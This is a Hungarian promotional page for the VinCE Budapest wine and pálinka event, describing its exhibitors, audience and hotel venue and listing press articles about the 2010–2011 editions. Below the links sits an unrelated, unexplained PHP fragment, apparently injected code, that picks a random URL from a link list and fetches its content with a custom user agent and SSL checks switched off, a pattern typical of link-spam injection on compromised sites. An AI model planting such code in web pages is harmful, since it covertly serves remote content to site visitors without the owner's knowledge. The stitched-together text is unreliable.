Mi az a VinCE Budapest?

Mi az a VinCE Budapest? Ahogy a név is jelenti, a rendezvény elsősorban a borról szól (vin), és Közép-Európában várja vendégeit (CE=Central Europe). A rendezvényen 160 kiállító állít ki, magyar és szomszédos országbeliek, illetve néhány távolabbi borászat is kóstoltatja borait.
A borok mellett a pálinkák is jelentős szerepet kapnak, a legjobb pálinkafőzdék termékeivel is megismerkedhetnek a... Tovább..

Mi az a VinCE Budapest?
Ahogy a név is jelenti, a rendezvény elsősorban a borról szól (vin), és Közép-Európában várja vendégeit (CE=Central Europe). A rendezvényen 160 kiállító állít ki, magyar és szomszédos országbeliek, illetve néhány távolabbi borászat is kóstoltatja borait.
A borok mellett a pálinkák is jelentős szerepet kapnak, a legjobb pálinkafőzdék termékeivel is megismerkedhetnek a látogatók. Egyéb gourmet-termékek – sajtok, olívaolajak, különleges kolbászok és sok más – ugyancsak helyet kapnak a rendezvényen.
A kiállítás mellett ültetett borkóstolókon – mesterkurzusokon – és interaktív workshopokon kóstolhatnak, tanulhatnak a borkedvelők, naprakész információt és hatékony segítséget kaphatnak a borászatok.

Kiknek szól?
Mindazoknak, akik értékelik a kiváló minőségű borokat, akik pedig ennél fogva minden termékben a különleges minőséget keresik, legyen az péksütemény vagy ásványvíz. A VinCE páratlan élményt kínál az értő borszeretőknek.
Ugyanakkor kihagyhatatlan rendezvény a szakma minden szereplőjének.
–    A sommelier találkozhat a borásszal, vele együtt kóstolhat, az így szerzett „sztorikat” pedig hasznosíthatja majd vendégei asztalánál.
–    Az éttermek tulajdonosai a legjobbak közül válogathatnak, az egész borlapjukat könnyedén összeállítják egy helyen.
–    A borról tanulóknak ez maga a tudás fellegvára.
–    A borászok étteremtulajdonosoknak, sommelier-knek, érdeklődő borszeretőknek mutathatják meg boraikat.
–    A kereskedők egy helyen találhatják a legjobb minőségű hazai borokat, különös tekintettel az újdonságokra.
–    A borimádók számára pedig ez maga a paradicsom, ahonnan nem akarnak majd hazamenni!

Hol rendezzük?
Közép-Európában, annak is a nagy bortermelő hagyományokkal rendelkező közepén, Magyarországon. A lüktető főváros, Budapest vonzza a konferenciákat és rendezvényeket – a budepesti fesztiválok és események pedig óriási népszerűségnek örvendenek világszerte. A VinCE 2010 boreseményre érkeztek vendégek a szomszédos országokból, távolabbi európai országokból, az Egyesült Államokból, de még Peruból is. 2011-ben még több külföldi vendégünk volt, az európai országokon kívül volt amerikai, japán és kínai vendégünk is szép számmal.
A város szívében, az Erzsébet körúton elhelyezkedő gyönyörű ötcsillagos szálloda pompájával hozzájárul a rendezvény sikeréhez és egyúttal méltó a legszebb borokhoz, a legnagyszerűbb előadókhoz. És nem utolsó sorban: a szálloda óriási rendezvénykomplexuma a legkorszerűbb technikával alkalmas egy nemzetközi rendezvény lebonyolításához.

Az alábbiakban néhány cikket gyűjtöttünk össze az előző két évi VinCE boreseményről:

http://www.jancisrobinson.com/articles/a20100322.html
http://hvg.hu/gasztronomia/20110321_csanyi_sandor_gere_attila_vince
http://borravalo.hu/2011/03/21/vince-2011-benyomasok/
http://www.vinoport.hu/?node=3274
http://www.foodandwine.hu/2011/03/08/marcius-boresemenye-vince-2011/
http://www.magyarborkulturaert.hu/?p=6165
http://index.hu/video/2011/03/22/elnoiesedik_a_magyar_palinka/
http://www.pecsiborozo.hu/blog/a_helyszinrol_jelentjuk
http://boraszportal.hu/hirszuret/20110321/atadtak_a_hundeszt_dijait
http://www.boraszat.hu/?mit=hirek&mit1=kivalaszt&id=3348
http://www.balaton.hu/?page=hirek&hir_akthely=70&hir_rovatid=152&hir_hirid=44802
http://receptek.tv/?oldal=1&cikk=549
http://pincerujsag.hu/andaluzia_borkulonlegessegek_mutatkoztak_be_
http://www.vasnepe.hu/cimlapon/20110321_vince_2011_pinceszetek_talalkozoja


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>